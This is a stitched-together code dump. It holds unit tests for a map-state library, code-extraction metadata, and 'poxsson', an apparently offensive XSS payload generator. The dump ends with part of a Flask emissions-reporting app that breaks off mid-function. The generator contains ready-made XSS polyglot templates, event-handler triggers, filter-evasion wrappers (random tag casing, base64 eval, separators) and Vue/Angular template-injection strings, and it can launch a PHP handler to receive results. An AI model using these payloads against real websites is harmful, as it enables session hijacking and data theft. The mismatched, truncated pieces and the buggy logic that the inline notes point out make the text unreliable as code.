        self.assertNotEqual(state2.type, MapStateType.UNKNOWN)
        self.assertEqual(state2.is_type(MapStateType.UNKNOWN), False)
        self.assertEqual(state2.is_type(None), False)
    def test_map_state(self):
        # Unknown keys return None instead of raising.
        ms = MapState()
        self.assertEqual(ms.get('Wrong'), None)
        self.assertEqual(ms.get(0), None)
        # set()/get() round-trips an entity keyed by its MapStateType.
        ms.set(MapStateType.MOUSE_LEFT_POS, (1, 1))
        me = ms.get(MapStateType.MOUSE_LEFT_POS)
        self.assertEqual(me.type, MapStateType.MOUSE_LEFT_POS)
        self.assertEqual(me.is_type(MapStateType.MOUSE_LEFT_POS), True)
        self.assertEqual(me.value, (1, 1))
        self.assertNotEqual(me.value, (1, 2))
    def test_map_state_translator(self):
        # Constructor rejects anything that is not (MapState, Selections).
        ms = MapState()
        sel = Selections()
        mst = MapStateTranslator(ms, sel)
        self.assertRaises(ValueError, MapStateTranslator, None, None)
        self.assertRaises(ValueError, MapStateTranslator, "Wrong", "bla")
    def test_mst_selection_was_moved(self):
        # A mouse move followed by a left-button click-and-release counts as
        # moving the current selection; clearing the selection resets it.
        ms = MapState()
        sel = Selections()
        mst = MapStateTranslator(ms, sel)
        sel.add(Point())
        ms.set(MapStateType.MOUSE_POS, wx.Point(0, 0))
        ms.set(MapStateType.MOUSE_POS, wx.Point(1, 1))
        ms.set(MapStateType.MOUSE_LEFT, True)
        ms.set(MapStateType.MOUSE_LEFT, False)
        self.assertEqual(mst.selection_was_moved, True)
        sel.clear()
        self.assertEqual(mst.selection_was_moved, False)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| [
"rapidmaps.map.state.MapStateType.contains",
"rapidmaps.map.selection.Selections",
"rapidmaps.map.state.MapState",
"rapidmaps.map.state.MapStateTranslator",
"rapidmaps.map.state.MapStateEntity",
"rapidmaps.map.state.MapStateType.get_default",
"unittest.main",
"wx.Point",
"rapidmaps.map.shape.Point"
... | [((2689, 2704), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2702, 2704), False, 'import unittest\n'), ((713, 752), 'rapidmaps.map.state.MapStateEntity', 'MapStateEntity', (['MapStateType.UNKNOWN', '(2)'], {}), '(MapStateType.UNKNOWN, 2)\n', (727, 752), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1012, 1075), 'rapidmaps.map.state.MapStateEntity', 'MapStateEntity', (['MapStateType.MOUSE_LEFT_POS', '(100, 100)', '(0, 0)'], {}), '(MapStateType.MOUSE_LEFT_POS, (100, 100), (0, 0))\n', (1026, 1075), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1451, 1461), 'rapidmaps.map.state.MapState', 'MapState', ([], {}), '()\n', (1459, 1461), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1933, 1943), 'rapidmaps.map.state.MapState', 'MapState', ([], {}), '()\n', (1941, 1943), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((1958, 1970), 'rapidmaps.map.selection.Selections', 'Selections', ([], {}), '()\n', (1968, 1970), False, 'from rapidmaps.map.selection import Selections\n'), ((1985, 2012), 'rapidmaps.map.state.MapStateTranslator', 'MapStateTranslator', (['ms', 'sel'], {}), '(ms, sel)\n', (2003, 2012), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((2215, 2225), 'rapidmaps.map.state.MapState', 'MapState', ([], {}), '()\n', (2223, 2225), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((2240, 2252), 'rapidmaps.map.selection.Selections', 'Selections', ([], {}), '()\n', (2250, 2252), False, 'from rapidmaps.map.selection import Selections\n'), ((2267, 2294), 'rapidmaps.map.state.MapStateTranslator', 'MapStateTranslator', (['ms', 'sel'], {}), '(ms, sel)\n', (2285, 2294), False, 'from rapidmaps.map.state import MapStateType, 
MapStateEntity, MapState, MapStateTranslator\n'), ((302, 345), 'rapidmaps.map.state.MapStateType.contains', 'MapStateType.contains', (['MapStateType.UNKNOWN'], {}), '(MapStateType.UNKNOWN)\n', (323, 345), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((378, 408), 'rapidmaps.map.state.MapStateType.contains', 'MapStateType.contains', (['"""WRONG"""'], {}), "('WRONG')\n", (399, 408), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((442, 495), 'rapidmaps.map.state.MapStateType.get_default', 'MapStateType.get_default', (['MapStateType.MOUSE_LEFT_POS'], {}), '(MapStateType.MOUSE_LEFT_POS)\n', (466, 495), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((576, 609), 'rapidmaps.map.state.MapStateType.get_default', 'MapStateType.get_default', (['"""WRONG"""'], {}), "('WRONG')\n", (600, 609), False, 'from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator\n'), ((2311, 2318), 'rapidmaps.map.shape.Point', 'Point', ([], {}), '()\n', (2316, 2318), False, 'from rapidmaps.map.shape import Point\n'), ((2359, 2373), 'wx.Point', 'wx.Point', (['(0)', '(0)'], {}), '(0, 0)\n', (2367, 2373), False, 'import wx\n'), ((2414, 2428), 'wx.Point', 'wx.Point', (['(1)', '(1)'], {}), '(1, 1)\n', (2422, 2428), False, 'import wx\n')] |
#!/usr/bin/python3
import argparse
from huepy import *
import sys
import importlib
import os
import base64
import pyperclip
import subprocess
from terminaltables import SingleTable
import random
import socket
#import atexit
POXSSON_PATH = os.path.realpath(__file__).replace("poxsson.py", "") #Absolute path of the project directory
# Trigger attributes usable inside the polyglot templates below.
# Row layout: [trigger name, compatible tags/context, usage notes].
polyglot_triggers = [
    ["onload","common tags", "0-click"],
    ["onpageshow","body","Works only without DOM dependency"],
    ["onfocus","input, select, a", "Use 'autofocus'for 0click"],
    ["onerror","img, input, object, link, script, video, audio","Specify wrong params to trigger error handling"],
    ["onanimationstart","CSS element","Fired then a CSS animation starts"],
    ["onanimationend","CSS element", "Fires when a CSS animation ends"],
    ["onstart","marquee","Fires on marquee animation start - Firefox only"],
    ["onfinish","marquee","Fires on marquee animation end - Firefox only"],
    ["ontoggle","details","Add ‘open’ attribute for 0-click"]
]
# XSS polyglot templates keyed by id. "TRIGGER" and "PAYLOAD" are literal
# placeholders substituted later (see main()); each template is designed to
# break out of multiple HTML/JS contexts at once.
polyglots = {
    "1" : """javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/TRIGGER=PAYLOAD//>""",
    "2" : "\"'--></noscript></noembed></template></title></textarea></style><script><svg TRIGGER=PAYLOAD></script>",
    "3" : "'\"--></title></textarea></style></noscript></noembed></template></frameset><svg TRIGGER=PAYLOAD>",
    "4" : "\"'>-->*/</noscript></title><script><svg TRIGGER=PAYLOAD></script>" ,
    "5" : "\"'--></style></script><svg TRIGGER=PAYLOAD>",
    "6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html TRIGGER="/**/ PAYLOAD//'">`"""
}
#Obtains local IP for use with handler
def local_ip():
    """Return the local IP address used for outbound traffic.

    "Connecting" a UDP socket to a public address sends no packets; it only
    makes the OS pick a source interface, which getsockname() then reports.
    """
    # Fixed: the original never closed the socket; the context manager
    # releases the file descriptor deterministically.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
def print_banner():
    """Print the ASCII-art POXSSON banner in green."""
    banner_rows = (
        "{_______  {__ {__ {__     {__  {__ __    {__ __    {__      {__",
        "{__    {__o   {__   {__   {__ {__    {__{__    {__ {___     {__ ",
        "{__    {__ {__ {__   {_ {_    {__        {__       {__ {__  {__ ",
        "{_______     {__       {_        {____       {____ {__  {__ {__",
        "{__        {__ {__    {__ {__        {__        {__{__   {_ {__",
        "{__       {__   {__  {__   {__ {__    {__{__    {__{__    {_ __",
        "{__      {__     {__{__      {__  {__ __    {__ __ {__      {__",
    )
    print("")
    print("")
    for row in banner_rows:
        print(green(row))
    print("")
#Function for printing metasploit-like tables ;>
def print_table(table_data):
    """Render `table_data` (first row = headers) as a metasploit-style table.

    Note: mutates `table_data` in place by inserting a dashed underline row
    right after the header row — callers that reuse the list see the change.
    """
    # One "-----" underline cell per header, matching each title's width.
    table_data.insert(1, ["-" * len(title) for title in table_data[0]])
    table_instance = SingleTable(table_data)
    # Strip every border so only the column alignment remains.
    table_instance.inner_heading_row_border = False
    table_instance.inner_row_border = False
    table_instance.inner_column_border = False
    table_instance.outer_border = False
    table_instance.justify_columns = {0: 'left', 1: 'left', 2: 'left'}
    print(table_instance.table)
    print('')
#Simply lists files under /payloads dir and prints info about them in color
def list_payloads():
    """Print every available payload module, trigger and polyglot template."""
    #print(f"\n{logs.red(logs.bold("|"))} PAYLOADS {logs.red(logs.bold("|"))}")
    table_data = [["Name", "Description", "Handler", "Length"]]
    payloads = []
    plds = []
    # os.walk yields (dirpath, dirnames, filenames); only the first tuple's
    # filenames are used below.
    for p in os.walk(POXSSON_PATH+'payloads'):
        payloads.append(p)
    payloads = payloads[0][2]
    for p in payloads:
        if ('init' in p or '.pyc' in p):
            pass #We don't want temporary files to interfere
        else:
            if ('.py' in p and not '.pyc' in p):
                plds.append(importlib.import_module("payloads."+p.replace(".py", ''))) #Each payload is imported and treated as a module
    for pl in plds:
        # A payload "has a handler" iff the module defines a `handler` attribute.
        try:
            handler = pl.handler
            handler = True
        except:
            handler = False
        table_data.append([red(pl.name), blue(pl.description), handler, len(pl.payload)])
    print(info(f"Available payloads: {len(plds)}"))
    print("")
    print_table(table_data)
    print("")
    # NOTE(review): list.insert() returns None, so polyglot_triggers_data is
    # always None; this also mutates the module-level polyglot_triggers list,
    # so a second call would insert the header row twice.
    polyglot_triggers_data = polyglot_triggers.insert(0, ["Name", "Compatibility", "Description"])
    print(info(f"Available triggers: {len(polyglot_triggers)}"))
    print("")
    print_table(polyglot_triggers)
    print("")
    print(good(f"Available polyglots: {len(polyglots)}"))
    for idn in polyglots:
        print(f"[{idn}] -> {polyglots[idn].replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))}")
    print("")
#Shows info (options, description, size...) about payload selected with "--payload" flag
def print_payload_info(payload_mod):
    """Print name, description, length, handler availability and the option
    tables of the payload module selected with the --payload flag.

    `payload_mod` is a payload module; `options` and `handler_options` are
    optional attributes holding [name, value, description] rows.
    """
    payload_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
    handler_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
    # A payload module may omit `handler` entirely; hasattr replaces the
    # original's clunky try/except probe.
    handler = hasattr(payload_mod, 'handler')
    # `options` / `handler_options` may also be missing, so guard the
    # attribute access instead of using a blanket bare except (which used
    # to swallow *any* error, including malformed entries).
    # NOTE(review): rows are appended as [name, value, description] while the
    # header reads NAME/DESCRIPTION/VALUE — columns look swapped; kept as-is.
    for opt in getattr(payload_mod, 'options', []):
        payload_options_table_data.append([opt[0], opt[1], opt[2]])
    for opt in getattr(payload_mod, 'handler_options', []):
        handler_options_table_data.append([opt[0], opt[1], opt[2]])
    #Prints all obtained data with f"" prefix formatting
    print(info(f"Name: {payload_mod.name}"))
    print(info(f"Description: {payload_mod.description}"))
    print(info(f"Length: {len(payload_mod.payload)} bytes"))
    print(info(f"Handler: {handler}"))
    if len(payload_options_table_data) > 1:
        print("")
        # Fixed: the original called info(...) without print(), discarding
        # the formatted heading entirely.
        print(info("Payload options:"))
        print("")
        print_table(payload_options_table_data)
    if len(handler_options_table_data) > 1:
        print("")
        print(info("Handler options:"))
        print("")
        print_table(handler_options_table_data)
#def test_payload(payload_name):
# pass
#I was so high writing this function lol
#But I suppose it just copies a PHP handler to a directory (?)
#And launches it from there using PHP inline interpreter
def start_php_handler(php_code):
    """Write `php_code` into php_handler_dir/handler.php, serve it with the
    PHP built-in web server on <local_ip>:8000 (blocking until the server
    exits), then delete the handler directory.
    """
    #subprocess.call(f"touch {POXSSON_PATH}php_handler_dir/handler.php", shell=True)
    with open(f"{POXSSON_PATH}php_handler_dir/handler.php", "w+") as handler_file:
        handler_file.write(php_code)
        # Redundant: the `with` block already closes the file on exit.
        handler_file.close()
    # NOTE(review): shell=True with an interpolated path/IP — fine for the
    # local, trusted values used here, but a list-argv call would be safer.
    subprocess.call(f"php -t {POXSSON_PATH}php_handler_dir -S {local_ip()}:8000", shell=True)
    subprocess.call(f"rm -rf {POXSSON_PATH}php_handler_dir", shell=True)
#Inserts default options, and also options passed as NAME=VAL in command line
def insert_options(payload_code, payload_options, cli_options):
    """Substitute UPPER-CASE option placeholders inside payload_code.

    Command-line "name=value" pairs (cli_options) are applied first; any
    option whose name does not appear in the command line falls back to its
    default value from payload_options ([name, description, value] rows).
    """
    result = payload_code
    joined_cli = ''.join(cli_options)
    # Explicit overrides from the command line win unconditionally.
    for pair in cli_options:
        fields = pair.split("=")
        result = result.replace(fields[0].upper(), fields[1])
    for entry in payload_options:
        placeholder = entry[0]
        default = entry[2]
        if default == "" and "=" in joined_cli:
            # Warn the operator that an option without a default was left unset.
            print(info(f"{placeholder.upper()} option is empty"))
        if placeholder.lower() not in joined_cli:
            result = result.replace(placeholder.upper(), default)
    return result
def arguments():
    """Build and parse the poxsson command line; returns an argparse Namespace."""
    parser = argparse.ArgumentParser(prog="poxsson")
    # Extra group used purely to visually separate wrapper-related flags.
    wrapping = parser.add_argument_group()
    #wrapping_group = wrapping.add_mutually_exclusive_group()
    parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs means that 0 or mor arguments of this type can be passed
    parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads')
    parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='<payload>', help='Specify the payload')
    parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity')
    parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info')
    parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion')
    parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard')
    parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='<file>', help='Save payload to a file')
    parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='<n[s|m|h]>', help='Execute payload after specific period of time (seconds, minutes, hours)')
    parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='<encoding>', help='Encode payload')
    parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='<sep>', help="Use specific (or random) separator between tag and first parameter")
    #Separate group for executable wrappers (it just looks more clear imho)
    wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload")
    wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic <script> tags")
    wrapping.add_argument('--tag-random', action='store_true', dest='TAG_RANDOM', help="Wrap payload with random <script> tags")
    wrapping.add_argument('--tag-different', action='store_true', dest='TAG_RANDOM_DIFFERENT', help="When combined with above option, generates different start and end tags")
    wrapping.add_argument('--tag-closer', action='store_true', dest='TAG_CLOSER', help="Use '//' instead of '>' for closing tags")
    wrapping.add_argument('--polyglot', action='store', dest='POLYGLOT', metavar="<id>", help="Wrap payload with selected or random polyglot wrapper")
    wrapping.add_argument('--polyglot-trigger', action='store', dest='POLYGLOT_TRIGGER', help="Wrap payload with polyglot wrapper")
    wrapping.add_argument('--cookie', action='store_true', dest='COOKIE', help="Use cookie shortener to reduce payload's size and detection probability")
    wrapping.add_argument('--confirm', action='store_true', dest='CONFIRM', help="Replace alert() popups with less detectable confirm()")
    wrapping.add_argument('--oneliner', action='store_true', dest='ONELINER', help="Convert generated payload to one-liner")
    wrapping.add_argument('--bookmarklet', action='store_true', dest='BOOKMARKLET', help="Convert generated payload to a bookmarklet")
    wrapping.add_argument('--handler', action='store_true', dest='HANDLER', help="Start handler after payload generation")
    wrapping.add_argument('--replace-http', action='store_true', dest='REPLACE_HTTP', help="Replace 'http[s]://' with a random substitute")
    wrapping.add_argument('--jquery', action='store_true', dest='JQUERY', help="Load JQuery before running the payload")
    wrapping.add_argument('--v2', action='store_true', dest='VUE_2', help="Embedd payload inside VueJS v2 template source")
    wrapping.add_argument('--v3', action='store_true', dest='VUE_3', help="Embedd payload inside VueJS v2 template source")
    wrapping.add_argument('--angular', action='store_true', dest='ANGULAR', help="Embedd payload inside AngularJS template source")
    #parser.add_argument('--replacei-chars', action='store', choices=['html', 'octal', 'url', 'iso', 'hex', 'numeric'], dest='REPLACE',
    #                    help="Replace all special characters with their equivalents of selected type")
    return parser.parse_args()
def main():
    """Parse the CLI, load the selected payload module, run it through the
    requested transformation pipeline (delay, encoding, wrapping, tags, ...)
    and finally print/copy/save the generated payload, optionally starting
    the payload's PHP handler.
    """
    res = arguments()
    if res.LIST_PAYLOADS:
        list_payloads()
        sys.exit()
    try:
        loaded_payload = importlib.import_module(f"payloads.{res.PAYLOAD}") #We try to load our specified payload here
    except ImportError:
        print(bad("No such payload"))
        sys.exit()
    js_code = loaded_payload.payload
    # --random-max: keep drawing random payload lines until one fits the limit.
    # NOTE(review): selected_payload is never assigned back to js_code, so this
    # whole branch has no effect on the generated payload.
    if res.RANDOM_MAX:
        if res.PAYLOAD == "random":
            selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
            while len(selected_payload) >= int(res.RANDOM_MAX):
                selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
        if res.PAYLOAD == "confirm":
            selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
            while len(selected_payload) >= int(res.RANDOM_MAX):
                selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
    js_code = insert_options(js_code, loaded_payload.options, res.OPTIONS) #Options replacement
    if res.DELAY:
        time_shorts = {'s':1000, 'm':60000, 'h':3600000}
        if type(res.DELAY) == int:
            delay_in_miliseconds = int(res.DELAY)
        else:
            if res.DELAY[-1] not in ['s', 'm', 'h']:
                print(err("Wrong delay format"))
                sys.exit()
            delay_in_miliseconds = int(res.DELAY[0:-1])*time_shorts[res.DELAY[-1]]
        # NOTE(review): the literal JS braces below are not escaped ({{ }}),
        # so the first { opens an f-string field containing the set display
        # {js_code} — the output embeds a Python set repr, not the payload.
        js_code = f"""setTimeout(function() {
        {js_code}
    }, {delay_in_miliseconds})""" #Our payload is embeded inside "setTimeout". The timeout itself is expanded from interval to miliseconds
    if res.JQUERY:
        js_code = f"""<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">{js_code}"""
    if res.INFO:
        print_payload_info(loaded_payload)
        sys.exit() #Shows details and exits
    if res.ONELINER:
        js_code = js_code.replace("\n", "") #Replaces newlines so the payload becomes a one-liner
    if res.BOOKMARKLET:
        js_code = "javascript:(function(){" + js_code.replace("\n", "") + "})();"
    if res.NULL_INSERT:
        null_char = "%%00"
        payload_len = len(js_code)
        start_position = random.randrange(payload_len)
        #Not finished yet, but it should insert NULLs on random positions.
    if res.REPLACE_HTTP:
        # NOTE(review): `substitute` is computed but never used — the
        # replacement below is always the literal "//".
        substitute = random.choice(["//", "/\\\\", "\\\\"])
        js_code = js_code.replace("http://", "//") #Sometimes http[s] can be omitted in payloads
        js_code = js_code.replace("https://", "//")
    if res.ENCODE:
        if res.ENCODE == "base64":
            # NOTE(review): b64encode returns bytes; interpolating it into an
            # f-string embeds the b'...' repr (including the b'' quoting).
            js_code = f"""eval(decode64('{base64.b64encode(js_code.encode("utf-8"))}'))"""
        elif res.ENCODE == "utf8":
            js_code = js_code.encode("utf-8") #Payload encoders
        else:
            # NOTE(review): `logs` is not defined anywhere — this branch would
            # raise NameError (though argparse choices make it unreachable).
            logs.err("No such encoding")
            sys.exit()
    if res.POLYGLOT: #Polyglot wrapper makes it easy to exec payload in multiple environments
        # NOTE(review): branches look inverted — "random" indexes the dict
        # (KeyError: no "random" key) while a concrete id gets random.choice.
        if res.POLYGLOT == "random":
            plg = polyglots[res.POLYGLOT]
        else:
            plg = random.choice(list(polyglots.values()))
        polyglot = plg.replace("PAYLOAD", js_code).replace("TRIGGER", res.POLYGLOT_TRIGGER)
        js_code = polyglot
    if res.TAG:
        js_code_non_tagged = js_code
        js_code = f"<script>{js_code}</script>"
    if res.COOKIE:
        js_code = js_code.replace("document.cookie", "cookie")
        js_code_non_tagged = js_code
    if res.SEPARATOR:
        separators = {
        "slash" : "/",
        "newline" : "\n",
        "tab" : "\t",
        "carriage" : '0x3c'
        }
        def select_separator():
            # "random" draws a fresh separator per tag occurrence.
            if res.SEPARATOR == "random":
                return random.choice(list(separators.values()))
            else:
                return separators[res.SEPARATOR]
        # NOTE(review): `bs` is never imported/defined (BeautifulSoup?), so
        # this branch raises NameError as written.
        src = bs.find_all(js_code, "html.parser")
        for tag in src.find_all():
            js_code = js_code.replace(tag.name, tag.name+select_separator())
        js_code_non_tagged = js_code
    if res.TAG_RANDOM: #Just a tag obfuscation (ex. <script> => <ScRiPt>)
        if res.TAG:
            js_code = js_code_non_tagged
        script_tag = "script"
        script_tag = "".join(random.choice([c.upper(), c]) for c in script_tag )
        end_tag = script_tag
        if res.TAG_RANDOM_DIFFERENT:
            end_tag = "".join(random.choice([c.upper(), c]) for c in script_tag )
        js_code = f"<{script_tag}>{js_code}</{end_tag}>"
    if res.TAG_CLOSER:
        js_code = js_code.replace(">", "//")
    if res.CONFIRM:
        js_code = js_code.replace("alert", "confirm")
    if res.VUE_2:
        js_code = f"{{constructor.constructor('{js_code}')()}}"
    if res.VUE_3:
        js_code = f"{{_openBlock.constructor('{js_code}')()}}"
    if res.ANGULAR:
        js_code = f"{{constructor.constructor('{js_code}')()}}"
    if res.CLIP: #Copies payload to system clipboard (can be pasted with Ctrl-V)
        pyperclip.copy(js_code)
    if res.OUTPUT: #Saves payload to a file
        with open(res.OUTPUT, "w+") as payload_file:
            payload_file.write(js_code)
            if res.VERBOSE:
                print(info(f"Saved payload as {res.OUTPUT}"))
    print(info(f"Payload length: {len(js_code)}"))
    print(good("Generated payload:"))
    print("")
    print(blue(js_code)) #Prints payload to STDIN in a fancy blue color :>
    if res.HANDLER:
        try:
            #Starts handler and inserts required options (defined inside payload's bodies)
            handler_code = loaded_payload.handler
            handler_code = insert_options(handler_code, loaded_payload.handler_options, res.OPTIONS)
            print(info("Started handler"))
            start_php_handler(handler_code)
        except AttributeError:
            print(err("This module does not have a handler"))
    #sys.exit()
#Btw, if you know JS, you can easily write you own, custom payloads.
#Each payload is a separate Python module. Here are possible variables:
# .payload - the actual code of the payload. Upper-case words (ex. CMD, LHOST) are later replaced as options names
# .[handler_]options - two-dimensional, single element list. Option entry looks like this: [<name>, <description>, <default_value>]
# .handler - custom, payload-specific PHP handler.
# Script entry point: show the banner, run the pipeline, and exit cleanly
# on Ctrl-C instead of dumping a KeyboardInterrupt traceback.
if __name__ == "__main__":
    print_banner()
    try:
        main()
    except KeyboardInterrupt:
        print("")
        print(info("Exiting"))
| [
"random.choice",
"importlib.import_module",
"argparse.ArgumentParser",
"socket.socket",
"terminaltables.SingleTable",
"random.randrange",
"os.path.realpath",
"pyperclip.copy",
"subprocess.call",
"sys.exit",
"os.walk"
] | [((1741, 1789), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (1754, 1789), False, 'import socket\n'), ((2894, 2917), 'terminaltables.SingleTable', 'SingleTable', (['table_data'], {}), '(table_data)\n', (2905, 2917), False, 'from terminaltables import SingleTable\n'), ((3506, 3540), 'os.walk', 'os.walk', (["(POXSSON_PATH + 'payloads')"], {}), "(POXSSON_PATH + 'payloads')\n", (3513, 3540), False, 'import os\n'), ((6796, 6864), 'subprocess.call', 'subprocess.call', (['f"""rm -rf {POXSSON_PATH}php_handler_dir"""'], {'shell': '(True)'}), "(f'rm -rf {POXSSON_PATH}php_handler_dir', shell=True)\n", (6811, 6864), False, 'import subprocess\n'), ((7717, 7756), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""poxsson"""'}), "(prog='poxsson')\n", (7740, 7756), False, 'import argparse\n'), ((239, 265), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (255, 265), False, 'import os\n'), ((12079, 12089), 'sys.exit', 'sys.exit', ([], {}), '()\n', (12087, 12089), False, 'import sys\n'), ((12124, 12174), 'importlib.import_module', 'importlib.import_module', (['f"""payloads.{res.PAYLOAD}"""'], {}), "(f'payloads.{res.PAYLOAD}')\n", (12147, 12174), False, 'import importlib\n'), ((13846, 13856), 'sys.exit', 'sys.exit', ([], {}), '()\n', (13854, 13856), False, 'import sys\n'), ((14221, 14250), 'random.randrange', 'random.randrange', (['payload_len'], {}), '(payload_len)\n', (14237, 14250), False, 'import random\n'), ((14373, 14411), 'random.choice', 'random.choice', (["['//', '/\\\\\\\\', '\\\\\\\\']"], {}), "(['//', '/\\\\\\\\', '\\\\\\\\'])\n", (14386, 14411), False, 'import random\n'), ((16998, 17021), 'pyperclip.copy', 'pyperclip.copy', (['js_code'], {}), '(js_code)\n', (17012, 17021), False, 'import pyperclip\n'), ((12288, 12298), 'sys.exit', 'sys.exit', ([], {}), '()\n', (12296, 12298), False, 'import sys\n'), ((13340, 13350), 'sys.exit', 'sys.exit', ([], 
{}), '()\n', (13348, 13350), False, 'import sys\n'), ((14873, 14883), 'sys.exit', 'sys.exit', ([], {}), '()\n', (14881, 14883), False, 'import sys\n')] |
# -*- coding: utf-8 -*-
from flask import Flask
from flask import render_template
from flask import request
from flask import make_response
import pandas as pd
import numpy as np
import csv
import io
# Flask application object; the route decorators below attach to it.
app = Flask(__name__)
@app.route("/")
def index():
    """Serve the landing page (templates/index.html)."""
    return render_template("index.html")
# Loaded once at import time; the app fails to start if the CSV is missing.
DATA = pd.read_csv("Export_Deepki_Ready_dae.csv", sep=",")
# Shared mutable state: the last computed emissions table, re-served by /export.
GLOBAL_EMISSIONS = [0, 0, ""]
# Maps the form's service id to [display name, "Code bien" lookup code].
# NOTE(review): the "\(" sequences are invalid escape sequences in plain
# strings — they look intended for regex matching that never happens; the
# names are only displayed. Confirm before "fixing".
SERVICE_TO_CODE = {
    "1": ["Routes", 1000007090],
    "2": ["Ports maritimes et littoral", 1000006785],
    "3": ["Phares et balises", 1000005715],
    "4": ["Prevention des pollutions", 1000005896],
    "5": ["Protection de la nature et des paysages", 1000006833],
    "6": ["Direction de l'eau", 1000007063],
    "7": ["MEEDDAT \(services centraux\)", 1000006798],
    "8": ["MEEDDAT \(services sociaux\)", 1000006018],
    "9": ["MEEDDM \(services déconcentrés\)", 1000006970],
    "10": ["Affaires maritimes \(services déconcentrés\)", 1000006765],
    "11": ["Éducation routière \(services déconcentrés\)", 1000006002],
    "12": ["DIR - Direct. Interdépart. des Routes", 1000055091],
    "13": ["DIRM- Direction interrégionale de la mer -DIRM", 1000005889],
    "14": ["DREAL", 1000026692],
    "15": ["DEAL", 1000061412],
    "16": ["DRIEA IDF", 1000055136],
    "17": ["SNOI - Service national des oléoducs interallié", 1000005891],
    "18": ["TRAPIL", 1000050607],
    "19": ["Culture marine", 1000050192],
    "20": ["Domaine remis aux collectivités territ.- Lois de décentralisation", 1000005889],
    "21": ["AVIATION CIVILE - Domaine régalien", 1000005888],
    "22": ["AVIATION CIVILE - Contrôle et Exploitation Aériens", 1000005907],
    "23": ["Chemins de fer", 1000006831],
    "24": ["Foncier d'origine routière en Île de France", 1000007093],
    "25": ["Aménagement foncier", 1000007060],
    "26": ["MINISTERE ECOLOGIE, DEVELOPPEMENT DURABLE, TRANSPORT ET LOGEMENT", 1000025380],
}
@app.route("/export", methods=["GET"])
def export():
    """Serve the last computed emissions table (GLOBAL_EMISSIONS) as a CSV
    download named emissions.csv."""
    if request.method == "GET":
        csvlist = GLOBAL_EMISSIONS
        # Fixed: io.StringIO.StringIO() is the Python 2 `StringIO.StringIO`
        # spelling and raises AttributeError under Python 3.
        si = io.StringIO()
        cw = csv.writer(si)
        # Column order matches the [electricity, gas, building] row layout.
        cw.writerow(["Electricite", "Gaz", "Batiment"])
        cw.writerows(csvlist)
        output = make_response(si.getvalue())
        output.headers["Content-Disposition"] = "attachment; filename=emissions.csv"
        output.headers["Content-type"] = "text/csv"
        return output
@app.route("/helper", methods=["GET", "POST"])
def form_example():
    """Handle the service/region form and render the emissions table."""
    if request.method == "POST":  # this block is only entered when the form is submitted
        service = request.form["services"]
        region = request.form["regions"]
        # NOTE(review): calculate_emissions can return an error *string*;
        # that case is not checked here and would break return_as_html.
        emissions_total = calculate_emissions(service, 2019.0, region)
        # `electricite`/`gaz` are computed but unused (leftovers of the
        # commented-out message below).
        electricite = emissions_total[0]
        gaz = emissions_total[1]
        # value = u'Les emissions du service %s dans la region %s est gaz: %s electricite: %s' % (service, region, gaz, electricite)
        return return_as_html(emissions_total, SERVICE_TO_CODE[service][0], region)
def return_as_html(total, nom, region):
    """Render the emissions rows as an HTML page with an export button.

    `total` holds [electricity, gas, building-name] rows; the row named
    "Total" is rendered in bold after four spacer rows. Also stashes
    `total` in the module-level GLOBAL_EMISSIONS for the /export route.
    (`nom` and `region` are currently unused.)
    """
    global GLOBAL_EMISSIONS
    GLOBAL_EMISSIONS = total
    parts = [
        "<head><title>Bilan d'emission</title><header><h1>Bilan d'emission</h1></header></head>",
